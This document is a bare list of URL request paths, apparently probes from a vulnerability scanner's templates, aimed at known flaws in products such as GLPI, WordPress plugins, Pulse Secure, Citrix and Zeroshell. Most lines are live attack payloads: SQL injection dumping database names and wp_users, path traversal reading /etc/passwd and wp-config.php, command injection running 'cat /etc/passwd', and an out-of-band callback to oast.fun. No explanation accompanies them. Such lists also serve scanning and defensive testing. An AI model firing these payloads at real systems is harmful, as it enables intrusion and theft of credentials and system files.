/?id={{str}}%25{128*128}
/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1
/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/secure/ContactAdministrators!default.jspa
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/free_time.cgi
/cgi-bin/kerbynet?Action=StartSessionSubmit&User=
/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29
/password.jsn
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/wp-json/visualizer/v1/upload-data
/pages/systemcall.php?command=cat%20/etc/passwd
/getcfg.php
/{{interface}}
/getFavicon?host=oast.fun?
/vpn/../vpns/cfg/smb.conf
/query?db=db&q=SHOW%20DATABASES
/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php
/cgi-bin/file_transfer.cgi
/objects/getImage.php?base64Url={{base64(encode)}}=&format=png
/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg
/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg
/objects/{{filename}}.txt
/api/timelion/run
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
